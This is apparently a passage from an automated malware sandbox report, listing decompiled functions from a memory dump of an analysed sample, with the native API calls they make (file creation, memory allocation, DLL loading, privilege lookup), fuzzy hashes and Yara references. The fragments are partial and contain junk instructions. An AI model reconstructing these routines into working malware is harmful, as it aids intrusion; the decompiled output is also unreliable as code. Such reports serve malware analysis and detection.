				_t16 = _a4;
				_t3 = _t16 + 0xc40; // 0xc40
				E0041A950(_t32, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t22 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}

0x00419d53
0x00419d5f
0x00419d67
0x00419d89
0x00419d9d
0x00419da1

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D

Strings

wKA, xrefs: 00419D89, 00419D94

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: c52dfbc41179b048eca3db7d306e51c4c9f2d85bf14226cc76e406243f2387bb
Instruction ID: c13bcab8a7b28e050fe9c35464facf7cfcfd0aa398e38944a10585ba3a2f81f4
Opcode Fuzzy Hash: c52dfbc41179b048eca3db7d306e51c4c9f2d85bf14226cc76e406243f2387bb
Instruction Fuzzy Hash: 6EF0B2B2211108AFCB08DF89DC95EEB77EDAF8C754F158248BA1DA7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419d5f
0x00419d67
0x00419d89
0x00419d9d
0x00419da1

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D

Strings

wKA, xrefs: 00419D89, 00419D94

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C640( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCE0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AE90(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acdc
0x0040acdf
0x0040ace4
0x0040ace9
0x0040acf3
0x0040acf8
0x0040acfb
0x0040acfd
0x0040ad05
0x0040ad0a
0x0040ad0a
0x0040ad11
0x0040ad19
0x0040ad1c
0x0040ad1e
0x0040ad32
0x00000000
0x0040ad34
0x0040ad3a
0x0040acee
0x0040acee
0x0040acee

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t12;
				long _t14;
				long _t18;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t18 = _a28;
				_t12 = _a24;
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _t12, _t18); // executed
				return _t14;
			}

0x00419f3f
0x00419f47
0x00419f4c
0x00419f4f
0x00419f69
0x00419f6d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419E80(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e83
0x00419e86
0x00419e8f
0x00419e97
0x00419ea5
0x00419ea9

APIs

NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00419F2A, Relevance: 1.5, APIs: 1, Instructions: 20
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00419F2A(long __eax, void* __esi, void* __eflags, intOrPtr _a4, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28) {
				long _t12;
				long _t19;
				void* _t22;
				void* _t25;

				_t10 = __eax;
				asm("invalid");
				if(__eflags >= 0) {
					_t25 = __esi + 1;
					_t14 = _a4;
					_push(_t25);
					_t3 = _t14 + 0xc60; // 0xca0
					E0041A950(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
					_t19 = _a28;
					_t10 = _a24;
				}
				_t12 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _t10, _t19); // executed
				return _t12;
			}

0x00419f2a
0x00419f2a
0x00419f2c
0x00419f2f
0x00419f33
0x00419f39
0x00419f3f
0x00419f47
0x00419f4c
0x00419f4f
0x00419f4f
0x00419f69
0x00419f6d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 18507abf9e40bb46fb4529c232b314b4def7e546d6d1ae79fab9a5e7961d1c54
Instruction ID: f5105274e27166297da9c4a3bc3f0f2fe6e5961f612a83e2d3000cc5799dd456
Opcode Fuzzy Hash: 18507abf9e40bb46fb4529c232b314b4def7e546d6d1ae79fab9a5e7961d1c54
Instruction Fuzzy Hash: DFD017B6210004BFCB04EF88E880CA773ADEF893047108119F95DC3201C630E8228BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E7A, Relevance: 1.5, APIs: 1, Instructions: 18
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00419E7A(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				asm("adc bl, [ebx+esi*2-0x40]");
				asm("rcr byte [edi-0x741374ab], cl");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e7a
0x00419e7e
0x00419e83
0x00419e86
0x00419e8f
0x00419e97
0x00419ea5
0x00419ea9

APIs

NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 8f34415b6bc168043da6a46989bfe9a97cd49eee1b9e846fd309e6e3209f1926
Instruction ID: c18f11e01a81c8321579b8a983bf89c2b925108a74155af7fe56685331df6443
Opcode Fuzzy Hash: 8f34415b6bc168043da6a46989bfe9a97cd49eee1b9e846fd309e6e3209f1926
Instruction Fuzzy Hash: 66E0C2A940E2C01BDB12EBB4A8D10C6BF809D521287184ACED4E807607C124A21993D1

Uniqueness

Uniqueness Score: -1.00%

Function 00409A80, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409A80(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B800( &_v284, 0x104);
						E0041BE70( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DB0(E00414D50(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00409a8b
0x00409a93
0x00409a95
0x00409a9a
0x00409a9f
0x00409ab2
0x00409ab7
0x00409ac0
0x00409acc
0x00409adf
0x00409ae4
0x00409ae7
0x00409af0
0x00409b02
0x00409b07
0x00409b0c
0x00000000
0x00000000
0x00409b0e
0x00409b12
0x00000000
0x00000000
0x00409b14
0x00000000
0x00409b12
0x00409b16
0x00409b19
0x00409b1f
0x00409b21
0x00409b2c
0x00409b31
0x00409b34
0x00409b41
0x00409b4c
0x00409b4e
0x00409b54
0x00409b58
0x00409b5b
0x00409b5b
0x00409b62
0x00409b65
0x00409b6a
0x00409b77
0x00409aa6
0x00409aa6
0x00409aa6

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}

0x0041a037
0x0041a03c
0x0041a04d
0x0041a051

APIs

RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D

Strings

oLA, xrefs: 0041A03C, 0041A048

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: oLA
API String ID: 1279760036-3789366272
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A059, Relevance: 3.0, APIs: 2, Instructions: 35
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041A059(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				asm("pushad");
				asm("sbb eax, 0x7fd6291c");
				asm("loop 0x57");
				_t7 = _a4;
				_t3 = _t7 + 0xc74; // 0xc74
				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a059
0x0041a05a
0x0041a05f
0x0041a063
0x0041a06f
0x0041a077
0x0041a08d
0x0041a091

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeHeapProcess
String ID:
API String ID: 1180424539-0
Opcode ID: 4b2a3078fed6b13659e0bc6f8067aae008e6643251e9e24cb295487048ae055d
Instruction ID: d8e84d74112cabc57a21fd64b5f2b3d04d3276e8ebca1fd33efa76e2bf956324
Opcode Fuzzy Hash: 4b2a3078fed6b13659e0bc6f8067aae008e6643251e9e24cb295487048ae055d
Instruction Fuzzy Hash: CBF0BEB42102006FCB10EF69CC46DA73B6CAF88320F11895ABD589B342D530EA20CBF2

Uniqueness

Uniqueness Score: -1.00%

Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 60
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004082E8(void* _a12) {
				void* _v0;
				void* _v71;
				void* _v72;
				signed int* _t23;
				signed int _t29;

				_push(_t23);
				_t29 =  *_t23 * 0x54216cc2;
				if (_t29 == 0) goto L4;
			}

0x004082e8
0x004082e9
0x004082ef

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: af54e4fcd7837778e957a36061b9199b4ad0d12dbf682ece2b9b488516d988a8
Instruction ID: 339dcf7600f3f40e698e560045f671dbabaf85678b10ae2c3e2c11f530d2fed6
Opcode Fuzzy Hash: af54e4fcd7837778e957a36061b9199b4ad0d12dbf682ece2b9b488516d988a8
Instruction Fuzzy Hash: 8301DB31A803287BE721A6958C43FEE775CAF41F14F04411EFE44BB1C1E7A9691547EA

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004082F0(void* __eflags, void* _a4, void* _a12) {
				void* _v67;
				void* _v68;
				void* _t35;

				_t35 = __eflags;
			}

0x004082f0

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1B1, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 522ad755005858cc0c7499f895870fc06c71c442dea2b9c1828558d115c68d1f
Instruction ID: 3504f3b14636880c3d63b688de9c86f4670166f7fb78c47f1e75fa2ade41decc
Opcode Fuzzy Hash: 522ad755005858cc0c7499f895870fc06c71c442dea2b9c1828558d115c68d1f
Instruction Fuzzy Hash: 0DF0AFB62041047BDB15DF95EC81DE77BA8EF85260B018A5EF89D4B246C634A819CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a06f
0x0041a077
0x0041a08d
0x0041a091

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a1da
0x0041a1f0
0x0041a1f4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A092, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041A092() {
				int _v0;
				intOrPtr _v4;
				void* _t12;
				void* _t13;

				asm("das");
				_t13 = _t12 + 1;
				asm("adc bl, [edx-0x48]");
				_push(0xffffff9e);
				asm("sbb [ebp+0x55187ea3], bl");
				_t5 = _v4;
				E0041A950(_t13, _v4, _v4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_v0);
			}

0x0041a093
0x0041a095
0x0041a096
0x0041a099
0x0041a09b
0x0041a0a3
0x0041a0ba
0x0041a0c8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e7541bae50c94838fa2601e4a45a17fbde3aa4dba90cd08e68ab60a5e0fb4810
Instruction ID: 28fd887898eeddae7d75349ce5cc5ecc339c44d980f0644ea2469e346f0b9bd7
Opcode Fuzzy Hash: e7541bae50c94838fa2601e4a45a17fbde3aa4dba90cd08e68ab60a5e0fb4810
Instruction Fuzzy Hash: A7E0DF712552002BC7209B648C95FDB3B988F49720F098599B9A82B282C032AE40C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A0A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a0a3
0x0041a0ba
0x0041a0c8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00407AFA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00407AFA(void* __eax, void* __ecx, void* __edi) {

				asm("in eax, 0x58");
				asm("repe fidivr dword [edx-0x6]");
				return 1;
			}

0x00407afa
0x00407b02
0x00407b1a

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8966ebf204498c5a9db706531d3aa90b37921a29ae3ddce7766fbe62a31cb9d3
Instruction ID: e39b8e47ecc41134bbb681b97fcbd0b21b632ed0c04b71fe82f0e59012509b31
Opcode Fuzzy Hash: 8966ebf204498c5a9db706531d3aa90b37921a29ae3ddce7766fbe62a31cb9d3
Instruction Fuzzy Hash: A1C08C33D390500AE6124E5E78912F8F7E8CB87238F2027C3E818EF881C347C0A6824C

Uniqueness

Uniqueness Score: -1.00%

Function 00417D66, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00417D66(void* __eax) {

				asm("rol esi, 0x2d");
				asm("sbb al, [esi-0x44ca506d]");
				return __eax;
			}

0x00417d66
0x00417d69
0x00417d79

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de07b9202ba1a89ab28b6a6baf0e407c8b0ff80e3235e6fae143c70964bd89b6
Instruction ID: c4c02f718f52b46650fa2b0d3d85b15c799d382bb6a14e0cf4fb6712492856af
Opcode Fuzzy Hash: de07b9202ba1a89ab28b6a6baf0e407c8b0ff80e3235e6fae143c70964bd89b6
Instruction Fuzzy Hash: 43B09207E441680080260C5939400B4E760C98B022E482AE7CD8CB34001006841902C9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmd.exe PID: 5112 Parent PID: 3388 cmd.exeCOMMON

Executed Functions

Function 033D9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 033D971A

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bedeabd348a40ece8adba6b822302adb06a6e06bdad4d6fda8534d6fce0d5be6
Instruction ID: dd8fb6effc8cf2252064d25098a353bec06aeb19663d8437da0958dbb61f617d
Opcode Fuzzy Hash: bedeabd348a40ece8adba6b822302adb06a6e06bdad4d6fda8534d6fce0d5be6
Instruction Fuzzy Hash: 4A90027521106806D100A5995448656000597E0381F51D021A9014559EC7A588917171

Uniqueness

Uniqueness Score: -1.00%

Function 033D9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 033D978A

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
